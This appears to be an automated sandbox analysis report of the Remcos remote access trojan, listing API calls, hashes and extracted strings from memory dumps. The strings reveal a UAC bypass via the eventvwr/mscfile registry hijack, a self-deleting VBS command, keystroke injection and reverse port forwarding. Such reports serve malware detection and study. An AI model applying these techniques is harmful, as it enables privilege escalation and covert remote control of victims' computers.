                                        • Instruction Fuzzy Hash: 51F110315083419AE729FBA4DA90BFFB7E5EF94208F40495DE086461D1EF70BE4EC652
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 65535$udp
                                        • API String ID: 0-1267037602
                                        • Opcode ID: d96b8bec8133ad84534840858c1a0b3172caf73b222da33939c307c08689efdd
                                        • Instruction ID: 8b1e538da09f589051eb7abab0de42d2d790709fca9e4006a039a157667603dc
                                        • Opcode Fuzzy Hash: d96b8bec8133ad84534840858c1a0b3172caf73b222da33939c307c08689efdd
                                        • Instruction Fuzzy Hash: 8451A1F52093019BEF20DB25D948B7B77F8EB89B40F08042DFC9296290E668FC459752
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 04A89C81
                                        • Sleep.KERNEL32(000001F4), ref: 04A89C8C
                                        • GetForegroundWindow.USER32 ref: 04A89C92
                                        • GetWindowTextLengthW.USER32(00000000), ref: 04A89C9B
                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 04A89CCF
                                        • Sleep.KERNEL32(000003E8), ref: 04A89D9D
                                          • Part of subcall function 04A8962E: SetEvent.KERNEL32(?,?,00000000,04A8A156,00000000), ref: 04A8965A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                        • String ID: [${ User has been idle for $ minutes }$]
                                        • API String ID: 911427763-3954389425
                                        • Opcode ID: 05acac8f48e78d6b1edd283a1b0ee73f33a607db971a3f679b0263270a71b95a
                                        • Instruction ID: 39c0166837db24bf11a8bfb7a972887d89ac5bdc58d4d70d2b9a0433807f0c44
                                        • Opcode Fuzzy Hash: 05acac8f48e78d6b1edd283a1b0ee73f33a607db971a3f679b0263270a71b95a
                                        • Instruction Fuzzy Hash: B151BFB16042406FF704FBA4D954ABFB7A9EB94308F40091DF98697290EF78BD06C792
                                        APIs
                                          • Part of subcall function 04A912B5: TerminateProcess.KERNEL32(00000000,04AF21E8,04A8E2B2), ref: 04A912C5
                                          • Part of subcall function 04A912B5: WaitForSingleObject.KERNEL32(000000FF), ref: 04A912D8
                                          • Part of subcall function 04A920E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,04AF2200), ref: 04A92104
                                          • Part of subcall function 04A920E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 04A9211D
                                          • Part of subcall function 04A920E8: RegCloseKey.ADVAPI32(00000000), ref: 04A92128
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 04A8C412
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A8C571
                                        • ExitProcess.KERNEL32 ref: 04A8C57D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                        • API String ID: 1913171305-2411266221
                                        • Opcode ID: 31622146a6ccac2823eef53dc9045a95fc93d82f8d5adf563b9be6d67c178a5e
                                        • Instruction ID: fbd59b4a74c3c2321c76af4cb191041b15bb80ed6d45afb13d66982371b90d71
                                        • Opcode Fuzzy Hash: 31622146a6ccac2823eef53dc9045a95fc93d82f8d5adf563b9be6d67c178a5e
                                        • Instruction Fuzzy Hash: E1413B729001186BEB18FBA5DD95DFE77B8EF64608F40016EE416A7191EE307E4BCA90
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB8632
                                        • GetLastError.KERNEL32(?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB863F
                                        • __dosmaperr.LIBCMT ref: 04AB8646
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB8672
                                        • GetLastError.KERNEL32(?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB867C
                                        • __dosmaperr.LIBCMT ref: 04AB8683
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,04A81D35,?), ref: 04AB86C6
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,04A81D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 04AB86D0
                                        • __dosmaperr.LIBCMT ref: 04AB86D7
                                        • _free.LIBCMT ref: 04AB86E3
                                        • _free.LIBCMT ref: 04AB86EA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                        • String ID:
                                        • API String ID: 2441525078-0
                                        • Opcode ID: 3008aa45d4bed9e619a34444c4d7281bb111d041dcac593cdeecabca2a672398
                                        • Instruction ID: 1b490de096007d0b850e68455287d86f113e765b12b8e0194ce1b207867e6923
                                        • Opcode Fuzzy Hash: 3008aa45d4bed9e619a34444c4d7281bb111d041dcac593cdeecabca2a672398
                                        • Instruction Fuzzy Hash: 5531AE7290120ABBEF11AFA8DC549EF3B6CEF04325F10461DF85196252EB39E911DBA0
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 04A8549F
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 04A8554F
                                        • TranslateMessage.USER32(?), ref: 04A8555E
                                        • DispatchMessageA.USER32(?), ref: 04A85569
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,04AF1F10), ref: 04A85621
                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 04A85659
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 2956720200-749203953
                                        • Opcode ID: 2ffff7fb370cccea506a469b05591b8210aff418a43f1712627edb10babd9e78
                                        • Instruction ID: bba1e2f4240541681faece72ccd202480274777ebd56d5b55ac30cd0f648416f
                                        • Opcode Fuzzy Hash: 2ffff7fb370cccea506a469b05591b8210aff418a43f1712627edb10babd9e78
                                        • Instruction Fuzzy Hash: 0141D272A04201ABEB14FB75DA5487F7BE9EBC5614F40091DF9528B180EF34EE06CB92
                                        APIs
                                        • _free.LIBCMT ref: 04AC5645
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04AC5651
                                        • _free.LIBCMT ref: 04AC565C
                                        • _free.LIBCMT ref: 04AC5667
                                        • _free.LIBCMT ref: 04AC5672
                                        • _free.LIBCMT ref: 04AC567D
                                        • _free.LIBCMT ref: 04AC5688
                                        • _free.LIBCMT ref: 04AC5693
                                        • _free.LIBCMT ref: 04AC569E
                                        • _free.LIBCMT ref: 04AC56AC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ff4be1393b9998745b752512b6cb3b191e244c1ef08f8ff0e3092a516a38729c
                                        • Instruction ID: 838b9a0d0bb24aeb3067609db1196559872f401558629f7cc4d066b96338c392
                                        • Opcode Fuzzy Hash: ff4be1393b9998745b752512b6cb3b191e244c1ef08f8ff0e3092a516a38729c
                                        • Instruction Fuzzy Hash: 3511A77550420CBFDF81EF94CA44CDD3B65FF04264B02C499BA894F121EA31FA649B80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                        • Instruction ID: 72540f9d3e7fa39a771508ee2c493a870cd51a4ede55867189a956feba1e954d
                                        • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                        • Instruction Fuzzy Hash: 5011C67950014CEFCB81EF54CD44CD93FA5EF48760F2250A5BA289FA21D636EA50DB84
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: $.F$6$t<F$!G$!G
                                        • API String ID: 176396367-201192458
                                        • Opcode ID: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                        • Instruction ID: 711221f8cf696f586f23d4d23215ef0040309f0162cc3079528fb509f4390870
                                        • Opcode Fuzzy Hash: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                        • Instruction Fuzzy Hash: 2E9196715083406AD3D8FB39DC60EBF73A9AF90600F50486EE666D6190EE349E09C6B7
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: xF
                                        • API String ID: 269201875-2169143296
                                        • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                        • Instruction ID: 4083c0018c8030c0268f2d9333adb7e1d78ac63f0f5af8baf4f33f601de7ab43
                                        • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                        • Instruction Fuzzy Hash: 5E61C275D00319AFEBA0CF69C840BAABBF4EF48720F34016AEC65EF640E77099418B54
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A97F6F
                                        • GdiplusStartup.GDIPLUS(04AF1668,?,00000000), ref: 04A97FA1
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 04A9802D
                                        • Sleep.KERNEL32(000003E8), ref: 04A980B3
                                        • GetLocalTime.KERNEL32(?), ref: 04A980BB
                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 04A981AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                        • API String ID: 489098229-3790400642
                                        • Opcode ID: 9af79842b59eac6a70922cd77f01e667e850d2262c006942a12f34d9b108d5d4
                                        • Instruction ID: 74cd67a5319755961cb909941f609f4985b87856cccfe10009c6f72c87fa471b
                                        • Opcode Fuzzy Hash: 9af79842b59eac6a70922cd77f01e667e850d2262c006942a12f34d9b108d5d4
                                        • Instruction Fuzzy Hash: B5515F71A00258ABFF14FBB4C9549FD77A9EF55208F44005DE546AB180EF38BE46C7A0
                                        APIs
                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,04AD41DF), ref: 04AD3107
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DecodePointer
                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                        • API String ID: 3527080286-3064271455
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 04A95A1A
                                          • Part of subcall function 04A9A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • Sleep.KERNEL32(00000064), ref: 04A95A46
                                        • DeleteFileW.KERNEL32(00000000), ref: 04A95A7A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: File$CreateDeleteExecuteShellSleep
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1462127192-2001430897
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,04AE9654,04AE9654,00000000), ref: 04A86775
                                        • ExitProcess.KERNEL32 ref: 04A86782
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ExecuteExitProcessShell
                                        • String ID: C:\Windows\SysWOW64\colorcpl.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                        • API String ID: 1124553745-2519146888
                                        APIs
                                        • AllocConsole.KERNEL32(00000001), ref: 04A9AA5D
                                        • ShowWindow.USER32(00000000,00000000), ref: 04A9AA76
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: AllocConsoleShowWindow
                                        • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                        • API String ID: 4118500197-4025029772
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04A9B22B
                                          • Part of subcall function 04A9B2C4: RegisterClassExA.USER32(00000030), ref: 04A9B310
                                          • Part of subcall function 04A9B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 04A9B32B
                                          • Part of subcall function 04A9B2C4: GetLastError.KERNEL32 ref: 04A9B335
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 04A9B262
                                        • lstrcpynA.KERNEL32(04AF1AF8,Remcos,00000080), ref: 04A9B27C
                                        • Shell_NotifyIconA.SHELL32(00000000,04AF1AE0), ref: 04A9B292
                                        • TranslateMessage.USER32(?), ref: 04A9B29E
                                        • DispatchMessageA.USER32(?), ref: 04A9B2A8
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 04A9B2B5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID: Remcos
                                        • API String ID: 1970332568-165870891
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        APIs
                                          • Part of subcall function 04AD2A89: CreateFileW.KERNEL32(00000000,00000000,?,04AD2E64,?,?,00000000,?,04AD2E64,00000000,0000000C), ref: 04AD2AA6
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 04AD2ECF
                                        • __dosmaperr.LIBCMT ref: 04AD2ED6
                                        • GetFileType.KERNEL32(00000000), ref: 04AD2EE2
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 04AD2EEC
                                        • __dosmaperr.LIBCMT ref: 04AD2EF5
                                        • CloseHandle.KERNEL32(00000000), ref: 04AD2F15
                                        • CloseHandle.KERNEL32(00000000), ref: 04AD305F
                                        • GetLastError.KERNEL32 ref: 04AD3091
                                        • __dosmaperr.LIBCMT ref: 04AD3098
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • API String ID: 4237864984-0
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 04AD100F
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD1092
                                        • __alloca_probe_16.LIBCMT ref: 04AD10CA
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,04AD123C,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD1125
                                        • __alloca_probe_16.LIBCMT ref: 04AD1174
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD113C
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD11B8
                                        • __freea.LIBCMT ref: 04AD11E3
                                        • __freea.LIBCMT ref: 04AD11EF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                        • API String ID: 201697637-0
                                        APIs
                                          • Part of subcall function 04AC5725: GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC575C
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                          • Part of subcall function 04AC5725: _abort.LIBCMT ref: 04AC57A3
                                        • _memcmp.LIBVCRUNTIME ref: 04AC2935
                                        • _free.LIBCMT ref: 04AC29A6
                                        • _free.LIBCMT ref: 04AC29BF
                                        • _free.LIBCMT ref: 04AC29F1
                                        • _free.LIBCMT ref: 04AC29FA
                                        • _free.LIBCMT ref: 04AC2A06
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: _free$ErrorLast$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 1679612858-1037565863
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: _free$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 137591632-1037565863
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • String ID: tcp$udp
                                        • API String ID: 0-3725065008
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Eventinet_ntoa
                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                        • API String ID: 3578746661-168337528
                                        APIs
                                        • Sleep.KERNEL32(00001388), ref: 04A89738
                                          • Part of subcall function 04A8966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,04A89745), ref: 04A896A3
                                          • Part of subcall function 04A8966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,04A89745), ref: 04A896B2
                                          • Part of subcall function 04A8966D: Sleep.KERNEL32(00002710,?,?,?,04A89745), ref: 04A896DF
                                          • Part of subcall function 04A8966D: CloseHandle.KERNEL32(00000000,?,?,?,04A89745), ref: 04A896E6
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04A89774
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 04A89785
                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 04A8979C
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 04A89816
                                          • Part of subcall function 04A9A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,04AE9654,?,00000000,00000000,00000000,00000000,00000000), ref: 04A8991F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                        • String ID: 05#v`#v
                                        • API String ID: 3795512280-3697325483
                                        APIs
                                          • Part of subcall function 04A9626A: __EH_prolog.LIBCMT ref: 04A9626F
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,04AE3050), ref: 04A9611A
                                        • CloseHandle.KERNEL32(00000000), ref: 04A96123
                                        • DeleteFileA.KERNEL32(00000000), ref: 04A96132
                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 04A960E6
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                        • String ID: <$@$Temp
                                        • API String ID: 1704390241-1032778388
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,04AF1E78,04AE2F54,?,00000000,04A8708D,00000000), ref: 04A86A56
                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,04A8708D,00000000,?,?,0000000A,00000000), ref: 04A86A9E
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • CloseHandle.KERNEL32(00000000,?,00000000,04A8708D,00000000,?,?,0000000A,00000000), ref: 04A86ADE
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 04A86AFB
                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 04A86B26
                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 04A86B36
                                          • Part of subcall function 04A84B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,04AF1E90,04A84C29,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84B85
                                          • Part of subcall function 04A84B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04A8546B), ref: 04A84BA3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                        • String ID: .part
                                        • API String ID: 1303771098-3499674018
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,04ABE2F6,04ABE2F6,?,?,?,04AC7215,00000001,00000001,80E85006), ref: 04AC701E
                                        • __alloca_probe_16.LIBCMT ref: 04AC7056
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04AC7215,00000001,00000001,80E85006,?,?,?), ref: 04AC70A4
                                        • __alloca_probe_16.LIBCMT ref: 04AC713B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04AC719E
                                        • __freea.LIBCMT ref: 04AC71AB
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • __freea.LIBCMT ref: 04AC71B4
                                        • __freea.LIBCMT ref: 04AC71D9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • API String ID: 3864826663-0
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04A97982
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979A3
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979C3
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979D7
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979ED
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04A97A0A
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04A97A25
                                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 04A97A41
                                        Memory Dump Source
